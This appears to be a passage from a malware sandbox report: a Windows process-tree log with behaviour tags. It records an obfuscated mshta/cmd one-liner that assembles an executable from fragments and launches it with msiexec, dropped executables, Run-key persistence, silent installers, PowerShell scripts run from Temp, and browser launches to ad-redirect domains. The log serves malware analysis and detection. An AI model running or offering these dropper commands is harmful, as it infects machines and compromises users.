C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE( creATEoBJEct("wscRIPT.SHEll"). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " ,0 , TRUE ) )12⤵PID:7144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y &cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo13⤵PID:6568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"14⤵PID:6988
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5424 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\Ff7k4.sIo14⤵PID:5520
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /IM "6567327.exe"11⤵
- Kills process with taskkill
PID:2992 -
C:\Users\Admin\AppData\Roaming\598006.exe"C:\Users\Admin\AppData\Roaming\598006.exe"8⤵PID:5860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 2889⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2208 -
C:\Users\Admin\AppData\Roaming\6044388.exe"C:\Users\Admin\AppData\Roaming\6044388.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1704 -
C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"6⤵
- Suspicious use of SetThreadContext
PID:5856 -
C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6000 -
C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe"C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe"6⤵PID:2104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 2927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1992 -
C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"6⤵
- Suspicious use of SetThreadContext
PID:5208 -
C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"7⤵PID:5968
-
C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe"C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe"6⤵PID:5896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6504 -
C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe"C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe"6⤵PID:1244
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6720 -
C:\Users\Admin\AppData\Local\Temp\neiner.exe"C:\Users\Admin\AppData\Local\Temp\neiner.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 5409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 5529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\clepper.exe"C:\Users\Admin\AppData\Local\Temp\clepper.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:6580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:5892
-
C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"10⤵PID:7012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 5729⤵
- Program crash
PID:6252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 5567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4596 -
C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe"C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe"6⤵PID:3692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 17327⤵
- Program crash
PID:4332 -
C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"6⤵PID:6456
-
C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp"C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp" /SL5="$601F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"7⤵
- Loads dropped DLL
PID:6556 -
C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe" /S /UID=27098⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1328 -
C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe"C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe"9⤵PID:6236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:7100 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:2412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:211⤵PID:5292
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:311⤵PID:6188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:811⤵
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
PID:1244 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:111⤵PID:6024
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:111⤵PID:6992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:111⤵PID:1812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:111⤵PID:4504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:111⤵PID:2884
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:811⤵PID:5300
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:811⤵PID:4732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5612 /prefetch:211⤵PID:7028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:111⤵PID:668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:111⤵PID:6204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:111⤵PID:6804
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:111⤵PID:7020
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:111⤵PID:1932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:111⤵PID:4384
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:111⤵PID:2148
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:111⤵PID:2652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:111⤵PID:2140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:111⤵PID:5664
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:111⤵PID:6932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:111⤵PID:6520
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:111⤵PID:4732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵PID:3656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:3944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵PID:1940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵PID:244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:5236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵PID:2088
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵PID:1648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:4776
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵PID:5984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe"C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe"9⤵PID:6632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exeC:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654"11⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2516 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636985251 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:5568
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe & exit10⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exeC:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe11⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe"C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe" -u12⤵PID:920
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S & exit10⤵PID:7064
-
C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S11⤵PID:6588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:1164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:5404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:4532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:5532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:5916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:3692
-
